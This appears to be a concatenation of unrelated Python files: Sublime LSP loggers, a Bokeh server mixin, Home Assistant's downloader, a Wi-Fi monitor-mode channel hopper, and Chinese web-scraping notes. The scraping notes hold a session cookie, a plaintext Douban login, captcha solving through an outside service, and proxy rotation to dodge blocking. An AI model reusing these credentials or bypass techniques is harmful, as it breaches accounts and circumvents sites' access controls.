walker.walk(self._diagnostics_by_file_async())
# The actual presentation of the phantom needs to happen on the UI thread, otherwise you'll see a phantom
# disappearing and then immediately after a phantom appearing. This is jarring. So run blocking.
sublime.set_timeout(lambda: self._set_diagnostic_phantom(self._cursor.value))
def _set_diagnostic_phantom(self, file_diagnostic: Optional[Tuple[str, Diagnostic]]) -> None:
self._clear_diagnostic_phantom()
if file_diagnostic:
file_path, diagnostic = file_diagnostic
view = self._window.find_open_file(file_path)
if view:
phantom_set = sublime.PhantomSet(view, self.DIAGNOSTIC_PHANTOM_KEY)
base_dir = self.get_project_path(file_path)
phantom = diagnostic_to_phantom(view, diagnostic, base_dir, self._navigate_diagnostic_phantom)
phantom_set.update([phantom])
self._window.focus_view(view)
view.show_at_center(phantom.region)
self._diagnostic_phantom_set = phantom_set
has_phantom = view.settings().get(self.DIAGNOSTIC_PHANTOM_KEY)
if not has_phantom:
view.settings().set(self.DIAGNOSTIC_PHANTOM_KEY, True)
else:
debug("no view for file", file_path)
else:
if self._diagnostic_phantom_set:
view = self._diagnostic_phantom_set.view
has_phantom = view.settings().get(self.DIAGNOSTIC_PHANTOM_KEY)
if not has_phantom:
view.settings().set(self.DIAGNOSTIC_PHANTOM_KEY, False)
def _navigate_diagnostic_phantom(self, href: str) -> None:
if href == "hide":
self._clear_diagnostic_phantom()
elif href == "next":
self._window.run_command("lsp_next_diagnostic")
elif href == "previous":
self._window.run_command("lsp_previous_diagnostic")
elif href.startswith("location:"):
self._window.open_file(href[len("location:"):], sublime.ENCODED_POSITION)
def _clear_diagnostic_phantom(self) -> None:
if self._diagnostic_phantom_set:
self._diagnostic_phantom_set.view.settings().set(self.DIAGNOSTIC_PHANTOM_KEY, False)
self._diagnostic_phantom_set.update([])
class WindowRegistry(object):
def __init__(self, configs: ConfigManager) -> None:
self._windows = {} # type: Dict[int, WindowManager]
self._configs = configs
def lookup(self, window: sublime.Window) -> WindowManager:
if window.id() in self._windows:
return self._windows[window.id()]
workspace = ProjectFolders(window)
window_configs = self._configs.for_window(window)
state = WindowManager(window=window, workspace=workspace, configs=window_configs)
self._windows[window.id()] = state
return state
def discard(self, window: sublime.Window) -> None:
self._windows.pop(window.id(), None)
class PanelLogger(Logger):
def __init__(self, manager: WindowManager, server_name: str) -> None:
self._manager = ref(manager)
self._server_name = server_name
def stderr_message(self, message: str) -> None:
"""
Not handled here, as stderr messages are handled by WindowManager regardless
of whether this logger is enabled.
"""
pass
def log(self, message: str, params: Any) -> None:
def run_on_async_worker_thread() -> None:
nonlocal message
params_str = str(params)
if 0 < userprefs().log_max_size <= len(params_str):
params_str = '<params with {} characters>'.format(len(params_str))
message = "{}: {}".format(message, params_str)
manager = self._manager()
if manager is not None:
manager.handle_server_message(":", message)
sublime.set_timeout_async(run_on_async_worker_thread)
def outgoing_response(self, request_id: Any, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_response(">>>", request_id), params)
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
if not userprefs().log_server:
return
self.log(self._format_response("~~>", request_id), error.to_lsp())
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("-->", method, request_id), params)
def outgoing_notification(self, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_notification(" ->", method), params)
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
if not userprefs().log_server:
return
direction = "<~~" if is_error else "<<<"
self.log(self._format_response(direction, request_id), params)
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("<--", method, request_id), params)
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
if not userprefs().log_server:
return
direction = "<? " if unhandled else "<- "
self.log(self._format_notification(direction, method), params)
def _format_response(self, direction: str, request_id: Any) -> str:
return "{} {} {}".format(direction, self._server_name, request_id)
def _format_request(self, direction: str, method: str, request_id: Any) -> str:
return "{} {} {}({})".format(direction, self._server_name, method, request_id)
def _format_notification(self, direction: str, method: str) -> str:
return "{} {} {}".format(direction, self._server_name, method)
class RemoteLogger(Logger):
PORT = 9981
DIRECTION_OUTGOING = 1
DIRECTION_INCOMING = 2
_ws_server = None # type: Optional[WebsocketServer]
_ws_server_thread = None # type: Optional[threading.Thread]
_last_id = 0
def __init__(self, manager: WindowManager, server_name: str) -> None:
RemoteLogger._last_id += 1
self._server_name = '{} ({})'.format(server_name, RemoteLogger._last_id)
if not RemoteLogger._ws_server:
try:
RemoteLogger._ws_server = WebsocketServer(self.PORT)
RemoteLogger._ws_server.set_fn_new_client(self._on_new_client)
RemoteLogger._ws_server.set_fn_client_left(self._on_client_left)
RemoteLogger._ws_server.set_fn_message_received(self._on_message_received)
self._start_server()
except OSError as ex:
if ex.errno == 48: # Address already in use
debug('WebsocketServer not started - address already in use')
RemoteLogger._ws_server = None
else:
raise ex
def _start_server(self) -> None:
def start_async() -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.run_forever()
RemoteLogger._ws_server_thread = threading.Thread(target=start_async)
RemoteLogger._ws_server_thread.start()
def _stop_server(self) -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.shutdown()
RemoteLogger._ws_server = None
if RemoteLogger._ws_server_thread:
RemoteLogger._ws_server_thread.join()
RemoteLogger._ws_server_thread = None
def _on_new_client(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client connecting (after handshake)."""
debug("New client connected and was given id %d" % client['id'])
# server.send_message_to_all("Hey all, a new client has joined us")
def _on_client_left(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client disconnecting."""
debug("Client(%d) disconnected" % client['id'])
def _on_message_received(self, client: Dict, server: WebsocketServer, message: str) -> None:
"""Called when a client sends a message."""
debug("Client(%d) said: %s" % (client['id'], message))
def stderr_message(self, message: str) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': 'stderr',
'params': message,
'isError': True,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_INCOMING,
'isError': is_error,
})
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_response(self, request_id: Any, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'isError': True,
'params': error.to_lsp(),
'time': round(time() * 1000),
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_notification(self, method: str, params: Any) -> None:
trimmed_params = deepcopy(params)
if method.endswith("didOpen"):
if isinstance(params, dict) and "textDocument" in params:
trimmed_params['textDocument']['text'] = '[trimmed]'
elif method.endswith("didChange"):
content_changes = params.get("contentChanges")
if content_changes and "range" not in content_changes[0]:
# full-document sync: trim the whole text, mirroring the didOpen/didSave cases
trimmed_params['contentChanges'][0]['text'] = '[trimmed]'
elif method.endswith("didSave"):
if isinstance(params, dict) and "text" in params:
trimmed_params['text'] = '[trimmed]'
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': method,
'params': trimmed_params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'error': 'Unhandled notification!' if unhandled else None,
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def _broadcast_json(self, data: Dict[str, Any]) -> None:
if RemoteLogger._ws_server:
json_data = json.dumps(data, sort_keys=True, check_circular=False, separators=(',', ':'))
RemoteLogger._ws_server.send_message_to_all(json_data)
class RouterLogger(Logger):
def __init__(self) -> None:
self._loggers = [] # type: List[Logger]
def append(self, logger: Logger) -> None:
self._loggers.append(logger)
def stderr_message(self, *args: Any, **kwargs: Any) -> None:
self._foreach("stderr_message", *args, **kwargs)
def outgoing_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_response", *args, **kwargs)
def outgoing_error_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_error_response", *args, **kwargs)
def outgoing_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_request", *args, **kwargs)
def outgoing_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_notification", *args, **kwargs)
def incoming_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_response", *args, **kwargs)
def incoming_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_request", *args, **kwargs)
def incoming_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_notification", *args, **kwargs)
def _foreach(self, method: str, *args: Any, **kwargs: Any) -> None:
for logger in self._loggers:
getattr(logger, method)(*args, **kwargs)
|
spade_bokeh.py
|
# -*- coding: utf-8 -*-
import asyncio
from threading import Thread
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from bokeh.application import Application
from bokeh.application.handlers import FunctionHandler
from bokeh.server.server import BaseServer
from bokeh.server.tornado import BokehTornado
from bokeh.server.util import bind_sockets
from bokeh.embed import server_document
class BokekServer(object):
def __init__(self, agent):
self.hostname = None
self.port = None
self.agent = agent
self.thread = Thread(target=self.bokeh_worker)
self.server = None
self.is_running = False
self.apps = {}
def start(self, hostname="localhost", port=5006):
"""
Starts the bokeh server.
Args:
hostname (str): hostname of the server. Must be the same where the agent is running. Defaults to "localhost"
port (int): port of the server. Defaults to 5006.
"""
self.hostname = hostname
self.port = port
self.thread.start()
self.is_running = True
def stop(self):
"""
Stops the Bokeh server.
"""
if self.server:
self.server.stop()
self.is_running = False
def bokeh_worker(self):
asyncio.set_event_loop(asyncio.new_event_loop())
sockets, port = bind_sockets(self.hostname, self.port)
extra_websocket_origins = ["{}:{}".format(self.hostname, self.port),
"{}:{}".format(self.hostname, self.agent.web.port)]
bokeh_tornado = BokehTornado(self.apps, extra_websocket_origins=extra_websocket_origins)
bokeh_http = HTTPServer(bokeh_tornado)
bokeh_http.add_sockets(sockets)
self.server = BaseServer(IOLoop.current(), bokeh_tornado, bokeh_http)
self.server.start()
self.server.io_loop.start()
def get_plot_script(self, path):
"""
Returns the necessary javascript to render a plot
Args:
path (str): the path with which the plot was registered in the server.
Returns:
A string with the javascript code to render the plot.
"""
return server_document("http://{hostname}:{port}{path}".format(hostname=self.hostname,
port=self.port,
path=path))
def add_plot(self, path, func):
"""
Registers a new plot in the bokeh server.
Args:
path: path where the plot will respond to queries
func: the function that renders the plot.
"""
self.apps[path] = Application(FunctionHandler(func))
class BokehServerMixin(object):
"""
This is the Mixin to inherit from when you create your agent.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.bokeh_server = BokekServer(agent=self)
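# Usage sketch (illustrative, not part of this module): an agent class that mixes
# in BokehServerMixin, starts the embedded server and registers a plot. The agent
# class name and the plot callback are assumptions for the example.
#
#     from spade.agent import Agent
#     from bokeh.plotting import figure
#
#     class PlottingAgent(BokehServerMixin, Agent):
#         async def setup(self):
#             self.bokeh_server.start(hostname="localhost", port=5006)
#             self.bokeh_server.add_plot("/my_plot", self.render_plot)
#
#         def render_plot(self, doc):
#             fig = figure(title="demo")
#             fig.line([0, 1, 2], [0, 1, 4])
#             doc.add_root(fig)
#
#     # later, e.g. from a web controller, embed the plot in a page:
#     # script = agent.bokeh_server.get_plot_script("/my_plot")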
|
__init__.py
|
"""Support for functionality to download files."""
import logging
import os
import re
import threading
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.util import sanitize_filename
_LOGGER = logging.getLogger(__name__)
ATTR_FILENAME = "filename"
ATTR_SUBDIR = "subdir"
ATTR_URL = "url"
ATTR_OVERWRITE = "overwrite"
CONF_DOWNLOAD_DIR = "download_dir"
DOMAIN = "downloader"
DOWNLOAD_FAILED_EVENT = "download_failed"
DOWNLOAD_COMPLETED_EVENT = "download_completed"
SERVICE_DOWNLOAD_FILE = "download_file"
SERVICE_DOWNLOAD_FILE_SCHEMA = vol.Schema(
{
vol.Required(ATTR_URL): cv.url,
vol.Optional(ATTR_SUBDIR): cv.string,
vol.Optional(ATTR_FILENAME): cv.string,
vol.Optional(ATTR_OVERWRITE, default=False): cv.boolean,
}
)
CONFIG_SCHEMA = vol.Schema(
{DOMAIN: vol.Schema({vol.Required(CONF_DOWNLOAD_DIR): cv.string})},
extra=vol.ALLOW_EXTRA,
)
def setup(hass, config):
"""Listen for download events to download files."""
download_path = config[DOMAIN][CONF_DOWNLOAD_DIR]
# If path is relative, we assume relative to HASS config dir
if not os.path.isabs(download_path):
download_path = hass.config.path(download_path)
if not os.path.isdir(download_path):
_LOGGER.error(
"Download path %s does not exist. File Downloader not active", download_path
)
return False
def download_file(service):
"""Start thread to download file specified in the URL."""
def do_download():
"""Download the file."""
try:
url = service.data[ATTR_URL]
subdir = service.data.get(ATTR_SUBDIR)
filename = service.data.get(ATTR_FILENAME)
overwrite = service.data.get(ATTR_OVERWRITE)
if subdir:
subdir = sanitize_filename(subdir)
final_path = None
req = requests.get(url, stream=True, timeout=10)
if req.status_code != 200:
_LOGGER.warning(
"downloading '%s' failed, status_code=%d", url, req.status_code
)
hass.bus.fire(
f"{DOMAIN}_{DOWNLOAD_FAILED_EVENT}",
{"url": url, "filename": filename},
)
else:
if filename is None and "content-disposition" in req.headers:
match = re.findall(
r"filename=(\S+)", req.headers["content-disposition"]
)
if match:
filename = match[0].strip("'\" ")
if not filename:
filename = os.path.basename(url).strip()
if not filename:
filename = "ha_download"
# Remove stuff to ruin paths
filename = sanitize_filename(filename)
# Do we want to download to subdir, create if needed
if subdir:
subdir_path = os.path.join(download_path, subdir)
# Ensure subdir exist
if not os.path.isdir(subdir_path):
os.makedirs(subdir_path)
final_path = os.path.join(subdir_path, filename)
else:
final_path = os.path.join(download_path, filename)
path, ext = os.path.splitext(final_path)
# If file exist append a number.
# We test filename, filename_2..
if not overwrite:
tries = 1
final_path = path + ext
while os.path.isfile(final_path):
tries += 1
final_path = f"{path}_{tries}.{ext}"
_LOGGER.debug("%s -> %s", url, final_path)
with open(final_path, "wb") as fil:
for chunk in req.iter_content(1024):
fil.write(chunk)
_LOGGER.debug("Downloading of %s done", url)
hass.bus.fire(
f"{DOMAIN}_{DOWNLOAD_COMPLETED_EVENT}",
{"url": url, "filename": filename},
)
except requests.exceptions.ConnectionError:
_LOGGER.exception("ConnectionError occurred for %s", url)
hass.bus.fire(
f"{DOMAIN}_{DOWNLOAD_FAILED_EVENT}",
{"url": url, "filename": filename},
)
# Remove file if we started downloading but failed
if final_path and os.path.isfile(final_path):
os.remove(final_path)
threading.Thread(target=do_download).start()
hass.services.register(
DOMAIN,
SERVICE_DOWNLOAD_FILE,
download_file,
schema=SERVICE_DOWNLOAD_FILE_SCHEMA,
)
return True
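# Example setup (illustrative): the integration is configured in configuration.yaml
# and the service is called with data matching SERVICE_DOWNLOAD_FILE_SCHEMA above.
#
#     # configuration.yaml
#     downloader:
#       download_dir: downloads
#
#     # service call: downloader.download_file
#     # data:
#     #   url: https://example.com/file.zip
#     #   subdir: archives
#     #   filename: file.zip
#     #   overwrite: false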
|
Interface.py
|
from os import system
from time import sleep
import threading
class Interface:
def __init__(self, interface):
self.name = interface
self.hopperRunning = False
self.hopperThread = None
def enableMonitor(self):
system("ifconfig {0} down && iwconfig {0} mode monitor && ifconfig {0} up".format(self.name))
print("[+] Enabled monitor mode")
def disableMonitor(self):
system("ifconfig {0} down && iwconfig {0} mode managed && ifconfig {0} up".format(self.name))
print("[+] Disabled monitor mode")
def startChannelHopper(self):
def channelHopper():
while self.hopperRunning:
for channel in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]:
sleep(1)
system("iw dev {0} set channel {1}".format(self.name, channel))
self.hopperThread = threading.Thread(target=channelHopper)
self.hopperRunning = True
self.hopperThread.start()
print("[+] Started channel hopper thread")
def stopChannelHopper(self):
if self.hopperThread is not None:
self.hopperRunning = False
print("\r[-] Stopping channel hopper thread ...")
self.hopperThread.join()
print("[+] Stopped channel hopper thread")
|
thread_example.py
|
# -*- coding: utf-8 -*-
"""
thread example
"""
__author__="aaron.qiu"
import time, threading
# Code executed by the new thread:
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
while n < 5:
n = n + 1
print('thread %s >>> %s' % (threading.current_thread().name, n))
time.sleep(1)
print('thread %s ended.' % threading.current_thread().name)
if __name__=='__main__':
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
|
receiver.py
|
#!/usr/bin/env python
from sqlite3 import DatabaseError
import rospy
from geometry_msgs.msg import PoseStamped
from nav_msgs.msg import Path
import threading
import socket
import time
class Receiver(object):
def __init__(self, addr='127.0.0.1', port=23334):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addr = addr
self.port = port
self.sock.settimeout(1.0)
self.sock.bind((self.addr, self.port))
self.thread = threading.Thread(target=self.receive_data)
self.thread.start()
self.timeout = False
# publisher
self.pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)
self.sub = rospy.Subscriber("/global_path_planning", Path, self.pathCallback)
rospy.init_node('joy_receiver')
rospy.spin()
def receive_data(self):
while True:
try:
data, _ = self.sock.recvfrom(4096)
splitted = data.decode("utf-8").split(',')
goal_x, goal_y = splitted[0], splitted[1]
robot_x, robot_y = -9999, -9999
if len(splitted) == 4:
robot_x, robot_y = splitted[2], splitted[3]
goal = PoseStamped()
goal.pose.position.x = int(goal_x)
goal.pose.position.y = int(goal_y)
goal.pose.orientation.x = int(robot_x)
goal.pose.orientation.y = int(robot_y)
self.pub.publish(goal)
self.timeout = False
except socket.timeout:
self.timeout = True
time.sleep(0.01)
def pathCallback(self, msg):
path_str = ''
for pose in msg.poses:
# print(pose.pose.position.x, pose.pose.position.y)
path_str += str(pose.pose.position.x) + ',' + str(pose.pose.position.y) + ';'
path_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
path_sock.sendto(bytes(path_str, 'ascii'), ('127.0.0.1', 23333))
if __name__ == '__main__':
try:
Receiver()
except rospy.ROSInterruptException:
pass
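# Test sketch (illustrative): the node listens for UDP datagrams on 127.0.0.1:23334
# formatted as "goal_x,goal_y" or "goal_x,goal_y,robot_x,robot_y", so a quick
# manual test from another Python shell could be:
#
#     import socket
#     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     sock.sendto(b"10,20,1,2", ("127.0.0.1", 23334))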
|
DayDayUp.py
|
# 1. Using the retrying module
~~~python
import requests
from retrying import retry
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}
@retry(stop_max_attempt_number=3)
def _parse_url(url):
print("*"*100)
response = requests.get(url, headers=headers, timeout=3)
return response.content.decode("utf-8")
def parse_url(url):
try:
html_str = _parse_url(url)
except:
html_str = None
return html_str
if __name__ == '__main__':
url = "http://www.baidu.com"
content = parse_url(url)
with open("content.html", "wb") as f:
f.write(content.encode("utf-8"))
~~~
# 2. Cookie dict comprehension
~~~python
Cookie= "BAIDUID=2372C5B0CA576383B4BB27FAD889D1F1:FG=1; " \
"BIDUPSID=2372C5B0CA576383B4BB27FAD889D1F1; " \
"PSTM=1540220135; BD_UPN=12314353; " \
"BDUSS=BFMGNqYXFNMkJnVHRIblctcGhxbllKMmRtbkhDdk1IUVRy" \
"bnFvaURrTFZtUUJjQVFBQUFBJCQAAAAAAAAAAAEAAABh-XRYYWlyY2" \
"92AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAANUM2VvVDNlbbV; locale=zh; BD_HOME=1; " \
"H_PS_PSSID=27541_1464_21104_22157"
cookie_dict = {i.split("=")[0]:i.split("=")[1] for i in Cookie.split("; ")}
print(cookie_dict)
# ===========================================================================
# douban login (selenium)
# get the cookies from the webdriver
cookies = {i["name"]: i["value"] for i in driver.get_cookies()}
print(cookies)
~~~
# 3. Saving an image locally with urlretrieve
~~~python
from urllib import request
# signature: urlretrieve(url, filename=None, reporthook=None, data=None)
request.urlretrieve(img_url, "images/" + img_name)  # download the image at img_url and save it locally
~~~
# 4. Using proxies
* Prepare a batch of IPs as a proxy pool and pick one at random
* How to pick a random proxy IP (see the sketch after the example below)
    * sort the IPs by how many times they have been used
    * pick randomly among the least-used ones
* Check that an IP still works
    * use the requests timeout parameter
    * or an online proxy-quality checking site
~~~python
import requests
proxies = {
"http": "http://219.141.153.12:8080"
}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}
response = requests.get("https://www.taobao.com", proxies=proxies, headers=headers)
print(response.status_code)
~~~
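A rough sketch of the "pick a random, least-used proxy" idea described above (the proxy addresses and counters are made-up placeholders):
~~~python
import random
import requests

# hypothetical usage counters for a small proxy pool
proxy_pool = {"http://219.141.153.12:8080": 0, "http://112.85.131.99:9999": 0}

def pick_proxy():
    """Pick randomly among the proxies that have been used the least."""
    min_used = min(proxy_pool.values())
    proxy = random.choice([p for p, used in proxy_pool.items() if used == min_used])
    proxy_pool[proxy] += 1
    return proxy

def check_proxy(proxy):
    """Use the requests timeout parameter to check that a proxy still works."""
    try:
        requests.get("https://httpbin.org/ip", proxies={"http": proxy, "https": proxy}, timeout=3)
        return True
    except requests.RequestException:
        return False
~~~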
# 5. requests.utils.unquote()
URL decoding
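A quick example (requests re-exports the standard library helper, as the tieba spider example later in these notes also relies on):
~~~python
from urllib.parse import quote, unquote

encoded = quote("下一页")                  # '%E4%B8%8B%E4%B8%80%E9%A1%B5'
print(unquote(encoded))                    # '下一页'
import requests
print(requests.utils.unquote(encoded))     # same result
~~~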
# 6. The zip and map functions
~~~python
a = [1, 2]
b = [3, 4]
c = list(zip(a, b))  # zip returns an iterator in Python 3
# c == [
#     (1, 3),
#     (2, 4)
# ]
poems_list = []
for value in zip(title_list, dynasty_list, author_list, contents):
title, dynasty, author, content = value
items = {
"title": title,
"dynasty": dynasty,
"author": author,
"content": content
}
poems_list.append(items)
return poems_list
~~~
~~~python
# 1. Given a dict d = {'a': 1, 'b': 2}, turn it into {1: 'a', 2: 'b'} as concisely as possible
dict(zip(d.values(), d.keys()))
~~~
~~~python
# 2. Anonymous functions are mostly used with functional helpers such as filter, sorted, map, reduce
list(filter(lambda x: x % 3 == 0, [1, 2, 3]))                    # [3]
sorted([1, 2, 3, 4, 5, 6, 7, 8, 9], key=lambda x: abs(5-x))      # [5, 4, 6, 3, 7, 2, 8, 1, 9]
list(map(lambda x: x+1, [1, 2, 3]))                              # [2, 3, 4]
reduce(lambda a, b: '{}, {}'.format(a, b), [1, 2, 3, 4, 5, 6, 7, 8, 9])  # '1, 2, 3, 4, 5, 6, 7, 8, 9'  (reduce lives in functools in Python 3)
~~~
~~~python
info_list = dl.xpath(".//p[@class='tel_shop']/text()").getall()
info_list = list(map(lambda x: re.sub(r"\s", "", x), info_list))
# print(info_list) # ['4室2厅', '133.84㎡', '高层(共16层)', '南北向', '2003年建', '']
~~~
# 7. splitext: splitting off the file extension
~~~python
import os,re
img_url = img.get("data-original")
alt = img.get("alt")
alt = re.sub(r"[\??。\.,,!!\*]", "", alt)
# splitext splits off the suffix: ('https://ws4.sinaimg.cn/bmiddle/9150e4e5gy1fxd0c5j6flg204m04o4bk', '.gif')
suffix = os.path.splitext(img_url)[1]  # the extension, e.g. ".gif"
img_name = alt + suffix
~~~
# 8. Multi-threaded and coroutine-pool crawlers
Multi-threaded version:
~~~python
import json
import random
import threading
import requests
from queue import Queue  # thread-safe queue
# from multiprocessing import JoinableQueue as Queue  # process queue; the rest of the code stays the same
from fake_useragent import UserAgent
from lxml import etree
import logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%Y-%m-%d %A %H:%M:%S',
filename='./info.log',
filemode='a'
)
class DianyingtiantangSpider(object):
def __init__(self):
self.start_url = "https://www.dy2018.com/html/gndy/dyzz/index.html"
self.url_temp = "https://www.dy2018.com/html/gndy/dyzz/index_{}.html"
self.ua = UserAgent().random
self.headers = {
# "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
# "user-agent": random.choice(self.ua)
}
self.url_queue = Queue()
self.html_queue = Queue()
self.detail_page_url_queue = Queue()
self.movie_queue = Queue()
def get_url_list(self): # 构造url列表
self.url_queue.put(self.start_url)
for i in range(2, 300):
self.url_queue.put(self.url_temp.format(i))
def parse_url(self): # 发送请求,获取响应
while True:
url = self.url_queue.get()
self.headers['user-agent'] = self.ua
response = requests.get(url, headers=self.headers)
            # the site declares charset=gb2312 (check the page source), so decode with gbk
            self.html_queue.put(response.content.decode("gbk"))
self.url_queue.task_done()
def get_content_list(self): # 提取电影详情页的url
while True:
html_str = self.html_queue.get()
html = etree.HTML(html_str)
detail_url_list = html.xpath("//table[@class='tbspan']//a/@href")
content_list = []
for detail_url_temp in detail_url_list:
detail_url = "https://www.dy2018.com" + detail_url_temp
content_list.append(detail_url)
self.detail_page_url_queue.put(content_list)
self.html_queue.task_done()
    def parse_detail_url(self):  # request the detail pages
        while True:
            detail_page_url_list = self.detail_page_url_queue.get()
            movie_list = []  # detail-page parsing is omitted in these notes
            self.movie_queue.put(movie_list)
            self.detail_page_url_queue.task_done()
def save_movies(self):
while True:
movies = self.movie_queue.get()
with open("./电影天堂.json", "a", encoding="utf-8") as f:
for movie in movies:
f.write(json.dumps(movie, ensure_ascii=False) + "\n")
self.movie_queue.task_done()
def run(self): # 实现主要逻辑
thread_list = []
# 1.构造url列表
t1 = threading.Thread(target=self.get_url_list)
thread_list.append(t1)
# 2.遍历列表,发送请求,获取响应
for i in range(5):
t2 = threading.Thread(target=self.parse_url)
thread_list.append(t2)
# 3.提取数据
t3 = threading.Thread(target=self.get_content_list)
thread_list.append(t3)
# 4.请求所有详情页数据
for i in range(5):
t4 = threading.Thread(target=self.parse_detail_url)
thread_list.append(t4)
# 5.保存数据
for i in range(2):
t5 = threading.Thread(target=self.save_movies)
thread_list.append(t5)
        # make the worker threads daemons so they exit when the main thread exits, then start them
        for t in thread_list:
            t.daemon = True
            t.start()
        # block the main thread until every queue's task counter drops to zero
        for q in [self.url_queue, self.html_queue, self.detail_page_url_queue, self.movie_queue]:
            q.join()
        print("main thread finished")  # multi-threaded design: high cohesion, low coupling
if __name__ == '__main__':
dianyingtiantangspider = DianyingtiantangSpider()
dianyingtiantangspider.run()
~~~
Coroutine pool (gevent)
~~~python
import time
from gevent import monkey
from gevent.pool import Pool
from lxml import etree
monkey.patch_all()
import requests
from queue import Queue
class QiushiSpider(object):
def __init__(self):
self.temp_url = 'https://www.qiushibaike.com/hot/page/{}'
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
}
self.url_queue = Queue()
self.pool = Pool()
self.response_mum = 0
self.request_mum = 0
self.count = 0
def run(self):
start_time = time.time()
self.async_start()
end_time = time.time()
print("耗时:{}".format((end_time - start_time)))
print("总数:{}".format(self.count))
def async_start(self):
"""异步请求"""
self.get_url()
# 执行异步请求
for i in range(5):
self.pool.apply_async(self.start, callback=self._callback)
while True:
time.sleep(0.001)
if self.response_mum >= self.request_mum:
break
def get_url(self):
"""获取url,保存到队列"""
for i in range(1, 14):
url = self.temp_url.format(i)
self.url_queue.put(url)
self.request_mum += 1
def start(self):
# 1.获取url
url = self.url_queue.get()
print(url)
data = self.send_request(url)
self.analysis_data(data)
# 保存
def _callback(self, item):
"""回调函数,必须传item形参"""
self.pool.apply_async(self.start, callback=self._callback)
def send_request(self, url):
"""发送请求"""
response = requests.get(url, headers=self.headers)
print(response.url)
data = response.content
self.response_mum += 1
return data
def analysis_data(self, data):
"""解析数据"""
html_data = etree.HTML(data)
# 1.获取25个帖子
div_list = html_data.xpath('//div[@id="content-left"]/div')
# 2. 遍历每一个帖子 取出 昵称
for div in div_list:
nick_name = div.xpath('.//h2/text()')[0]
print(nick_name.strip())
self.count += 1
if __name__ == '__main__':
qiushi = QiushiSpider()
qiushi.run()
~~~
~~~python
# iterate over a list getting both the index and the value
for index, info in enumerate(infos):
    print(index, info)
~~~
13_face_spider_v2.py
# 9. selenium
~~~python
from selenium import webdriver
import time
import requests
from dama import identify
# 实例化driver
driver = webdriver.Chrome()
driver.get("https://www.douban.com/")
driver.find_element_by_id("form_email").send_keys("aircov@163.com")
driver.find_element_by_id("form_password").send_keys("douban123456")
# recognize the captcha, if there is one
try:
    captcha_image_url = driver.find_element_by_id("captcha_image").get_attribute("src")  # captcha image url
except Exception:
    # no captcha: log in directly
    driver.find_element_by_class_name("bn-submit").click()
else:
    captcha_content = requests.get(captcha_image_url).content  # download the captcha image
    captcha_code = identify(captcha_content)  # send it to the captcha-solving service
    print("captcha recognized as: %s" % captcha_code)
    # type in the captcha
